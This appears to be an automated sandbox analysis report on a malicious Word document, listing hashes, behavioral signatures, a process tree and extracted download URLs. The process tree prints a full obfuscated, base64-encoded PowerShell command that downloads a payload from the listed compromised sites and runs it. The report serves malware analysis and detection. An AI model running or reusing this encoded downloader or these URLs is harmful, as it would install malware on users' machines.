Analysis
-
max time kernel
103s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20/09/2024, 08:43
Static task
static1
Behavioral task
behavioral1
Sample
ed3ac3c1698350adde5e38dde5f1975d_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
ed3ac3c1698350adde5e38dde5f1975d_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ed3ac3c1698350adde5e38dde5f1975d_JaffaCakes118.doc
-
Size
171KB
-
MD5
ed3ac3c1698350adde5e38dde5f1975d
-
SHA1
bb2466c3fd9aaa2f604bcace5b70085aa3c4d0a2
-
SHA256
1e3b648d4c453ce0522af1478833be9b411d31b891f5479bef7805cc9e051cae
-
SHA512
4848c0ed541f054c31f6323423efca11cece95107198041c816a7411778ece0ea4f6ce8bb4c6102209d1c86a10816abf49daef423a5609a87085baf647d23f48
-
SSDEEP
3072:Hs9ufstRUUKSns8T00JSHUgteMJ8qMD7g7FcZaBD:Hs9ufsfgIf0pLhcZKD
Malware Config
Extracted
http://coffeecons.com/joomla30/LU7/
http://www.noramua.com/wp-content/Eb/
http://chakteholistico.com/wp-includes/7c/
https://zeitraisen.com/wordpress/GoG/
http://gosmart-online.com/wp-includes/9/
https://www.campuscamarafp.com/wp-admin/uEx/
http://eastafricarefugeerelief.com/aopaf/public/GiFSUetbCLK/C/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1988 2628 POwersheLL.exe 82 -
Blocklisted process makes network request 4 IoCs
flow pid Process 24 1988 POwersheLL.exe 56 1988 POwersheLL.exe 71 1988 POwersheLL.exe 75 1988 POwersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5032 WINWORD.EXE 5032 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1988 POwersheLL.exe 1988 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1988 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 5032 WINWORD.EXE 5032 WINWORD.EXE 5032 WINWORD.EXE 5032 WINWORD.EXE 5032 WINWORD.EXE 5032 WINWORD.EXE 5032 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed3ac3c1698350adde5e38dde5f1975d_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5032
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABUAGkAXwBfAHYAOQA1AD0AKAAoACcAWQAnACsAJwA1ADgAJwApACsAKAAnAGsAbAB3ACcAKwAnAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG4AYgAxAFAAQwBEAEQAXABLAEUATQAyAEoANABVAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQByAGUAYwBUAE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBwAGAAUgBgAG8AVABPAEMAbwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAnACkAKwAoACcAMgAsACAAJwArACcAdABsACcAKwAnAHMAJwApACsAKAAnADEAMQAnACsAJwAsACAAJwApACsAKAAnAHQAJwArACcAbABzACcAKQApADsAJABBADgAbwBrAHoAbAB4ACAAPQAgACgAJwBGADkAJwArACgAJwBlAHYAJwArACcAegBuACcAKQArACcAYQB6ACcAKQA7ACQASAAxAHQAZABqADEAaQA9ACgAJwBJACcAKwAoACcAdAByACcAKwAnAG0AeAAnACsAJwBfAHUAJwApACkAOwAkAFUANQA1AGQAeQBxAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcASgAnACsAJwAxAHkAJwArACgAJwBOAGIAJwArACcAMQBwACcAKQArACgAJwBjAGQAZAAnACsAJwBKACcAKQArACgAJwAxACcAKwAnAHkASwAnACsAJwBlAG0AMgBqACcAKQArACgAJwA0AHUAJwArACcASgAxAHkAJwApACkALgAiAFIAZQBgAHAAbABgAEEAYwBFACIAKAAoACcASgAxACcAKwAnAHkAJwApACwAWwBzAFQAUgBpAE4AZwBdAFsAYwBIAEEAUgBdADkAMgApACkAKwAkAEEAOABvAGsAegBsAHgAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABWAHIAaQBnADQAaQAzAD0AKAAoACcAUwB0ACcAKwAnAGwAJwApACsAKAAnAHoAJwArACcAMABtAG8AJwApACkAOwAkAE0AdABsADMANABwAGIAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AVwBlAEIAYwBsAGkARQBuAFQAOwAkAEkAMAA0ADkAZwB6ADgAPQAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8ALwBjACcAKwAnAG8AJwApACsAKAAnAGYAJwArACcAZgBlACcAKQArACgAJwBlACcAKwAnAGMAbwAnACkAKwAnAG4AcwAnACsAKAAnAC4AYwAnACsAJwBvAG0AJwApACsAJwAvACcAKwAoACcAagBvAG8AbQBsACcAKwAnAGEAJwApACsAKAAnADMAMAAnACsAJwAvACcAKQArACcATABVACcAKwAnADcALwAnACsAKAAnACoAJwArACcAaAB0AHQAcAA6ACcAKQArACcALwAvACcAKwAoACcAdwAnACsAJwB3AHcAJwApACsAJwAuACcAKwAoACcAbgBvACcAKwAnAHIAYQBtAHUAYQAuACcAKQArACgAJwBjAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAAJwArACcALQBjAG8AbgAnACkAKwAnAHQAJwArACgAJwBlACcAKwAnAG4AdAAvAEUAYgAvACoAJwApACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAvACcAKwAnAGMAaAAnACkAKwAoACcAYQAnACsAJwBrAHQAZQAnACkAKwAoACcAaABvAGwAaQAnACsAJwBzACcAKQArACgAJwB0AGkAJwArACcAYwBvAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGkAJwArACcAbgBjAGwAJwArACcAdQBkAGUAcwAnACkAKwAoACcALwAnACsAJwA3AGMALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnAHMAOgAnACkAKwAoACcALwAnACsAJwAvAHoAZQAnACsAJwBpAHQAJwApACsAJwByACcAKwAoACcAYQBpACcAKwAnAHMAZQAnACsAJwBuAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AdwAnACsAJwBvAHIAJwArACcAZABwAHIAZQBzAHMALwBHAG8AJwApACsAKAAnAEcALwAnACsAJwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8ALwBnAG8AJwArACcAcwBtAGEAcgB0ACcAKwAnAC0AbwAnACkAKwAnAG4AbAAnACsAJwBpAG4AJwArACcAZQAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAJwAvACcAKwAnAHcAcAAnACsAJwAtACcAKwAoACcAaQBuACcAKwAnAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAvACcAKQArACcAOQAvACcAKwAoACcAKgAnACsAJwBoAHQAJwApACsAKAAnAHQAJwArACcAcABzADoALwAnACkAKwAoACcALwAnACsAJwB3AHcAdwAnACkAKwAoACcALgBjAGEAJwArACcAbQBwACcAKQArACgAJwB1AHMAJwArACcAYwAnACkAKwAnAGEAJwArACgAJwBtAGEAcgBhAGYAJwArACcAcAAnACkAKwAoACcALgBjACcAKwAnAG8AbQAvACcAKQArACgAJwB3AHAAJwArACcALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuACcAKwAnAC8AdQBFACcAKwAnAHgALwAnACsAJwAqAGgAJwApACsAJwB0AHQAJwArACcAcAA6ACcAKwAoACcALwAvAGUAYQBzAHQAJwArACcAYQAnACkAKwAoACcAZgByACcAKwAnAGkAYwBhACcAKQArACcAcgAnACsAKAAnAGUAZgB1AGcAZQAnACsAJwBlACcAKQArACgAJwByAGUAbAAnACsAJwBpAGUAZgAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvAGEAJwApACsAJwBvAHAAJwArACgAJwBhACcAKwAnAGYALwAnACkAKwAoACcAcAB1AGIAJwArACcAbABpAGMALwBHACcAKwAnAGkARgBTAFUAZQAnACsAJwB0AGIAQwAnACsAJwBMAEsALwBDAC8AJwApACkALgAiAFMAUABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASABqAGsAaQBrADQAegA9ACgAKAAnAFIAOQBfAGQAJwArACcANQAnACkAKwAnAGsAdgAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABZADYAdAB3AHgAcAAzACAAaQBuACAAJABJADAANAA5AGcAegA4ACkAewB0AHIAeQB7ACQATQB0AGwAMwA0AHAAYgAuACIAZABvAGAAVwBuAGwAbwBgAEEARABmAGAASQBMAEUAIgAoACQAWQA2AHQAdwB4AHAAMwAsACAAJABVADUANQBkAHkAcQBhACkAOwAkAE8AbgA3ADcANABzADkAPQAoACcAWQAnACsAKAAnADEAbgAxAG8AJwArACcAdABvACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUANQA1AGQAeQBxAGEAKQAuACIATABgAEUAYABOAGcAVABoACIAIAAtAGcAZQAgADMAOQA4ADcANQApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABVADUANQBkAHkAcQBhACkAOwAkAEgAYwBvAHoAbQAwAGIAPQAoACcARAAnACsAJwBzADcAJwArACgAJwBqACcAKwAnAHoAYQBwACcAKQApADsAYgByAGUAYQBrADsAJABKAGYAdwByAHQAcAA0AD0AKAAnAEYAawAnACsAJwB1ACcAKwAoACcAcAAwADIAJwArACcAZwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgAwAHQAaQBnAGsAaAA9ACgAJwBWAGUAJwArACgAJwB5ACcAKwAnAGEAYwA1AGoAJwApACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD5c09ad787e2e9b9d9775fc584d5dc4927
SHA13c9eb20d39f3f9e5090df8f96a9048f67f9a4c6a
SHA25664f41475ae77195c876df5519d953abf695e6a25d0a6b6153d37d37472802204
SHA51252d546192d1b6a7a9d811436986c4daa60eb3628eedb3178fefd837df82df2f392b8a09b5369b503d9456461c3c65611d9c3018a765326f7ef634e115c7b16a0